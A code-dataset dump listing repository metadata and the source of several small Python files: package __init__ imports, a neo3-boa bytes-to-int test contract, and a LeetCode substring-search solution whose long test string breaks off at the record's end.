da12b6a52d3fc9c730e1d1eeacaa6d94a6730ab0 | 199 | py | Python | policy_evaluation/__init__.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 111 | 2017-07-27T13:19:21.000Z | 2022-01-15T17:52:55.000Z | policy_evaluation/__init__.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 3 | 2017-12-05T07:18:23.000Z | 2018-04-30T00:03:36.000Z | policy_evaluation/__init__.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 12 | 2017-07-31T13:46:25.000Z | 2021-08-23T04:03:19.000Z | from policy_evaluation.categorical import CategoricalPolicyEvaluation
from policy_evaluation.deterministic import DeterministicPolicy
from policy_evaluation.exploration_schedules import get_schedule
| 49.75 | 69 | 0.924623 | 20 | 199 | 8.95 | 0.6 | 0.167598 | 0.335196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060302 | 199 | 3 | 70 | 66.333333 | 0.957219 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
da15e7cd1af861ec25b37633e0a43836343e5ba6 | 101 | py | Python | boa3_test/test_sc/bytes_test/BytesToInt.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/bytes_test/BytesToInt.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/bytes_test/BytesToInt.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin import public
@public
def bytes_to_int() -> int:
return b'\x01\x02'.to_int()
| 14.428571 | 31 | 0.693069 | 17 | 101 | 3.941176 | 0.764706 | 0.149254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059524 | 0.168317 | 101 | 6 | 32 | 16.833333 | 0.738095 | 0 | 0 | 0 | 0 | 0 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
da22b4253efd734f65a73b9f2f6a49b49797427b | 42 | py | Python | nbib/__init__.py | holub008/nbib | 1929d26b7256e747e0c679d2e94f6e0f2d160636 | [
"MIT"
] | 6 | 2020-06-08T13:24:17.000Z | 2022-03-23T17:31:52.000Z | nbib/__init__.py | holub008/nbib | 1929d26b7256e747e0c679d2e94f6e0f2d160636 | [
"MIT"
] | 5 | 2020-06-12T10:13:47.000Z | 2022-03-23T17:31:28.000Z | nbib/__init__.py | holub008/nbib | 1929d26b7256e747e0c679d2e94f6e0f2d160636 | [
"MIT"
] | 1 | 2021-12-15T15:24:51.000Z | 2021-12-15T15:24:51.000Z | from nbib._parsing import read, read_file
| 21 | 41 | 0.833333 | 7 | 42 | 4.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 42 | 1 | 42 | 42 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5a2cb401ee89de05ab9e1c611d868f2e0fd9d30 | 60,847 | py | Python | easy/strstr.py | flsworld/leetcode | 1450db885e132be83d2297323900abdbcecebdb8 | [
"MIT"
] | null | null | null | easy/strstr.py | flsworld/leetcode | 1450db885e132be83d2297323900abdbcecebdb8 | [
"MIT"
] | null | null | null | easy/strstr.py | flsworld/leetcode | 1450db885e132be83d2297323900abdbcecebdb8 | [
"MIT"
] | null | null | null | def str_str_orig(haystack: str, needle: str) -> int:
if not needle:
return 0
if needle not in haystack:
return -1
for i in range(len(haystack)):
if haystack[i] != needle[0]:
continue
j = 1
while needle[j] == haystack[i + j]:
if j == len(needle) - 1:
return i
j += 1
return -1
def str_str(haystack: str, needle: str) -> int:
if not needle:
return 0
length = len(needle)
for i in range(len(haystack) - length + 1):
if haystack[i:i + length] == needle:
return i
return -1
if __name__ == "__main__":
# haystack, needle = "hello", "ll"
# res = str_str(haystack, needle)
#
# assert res == 2
haystack = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa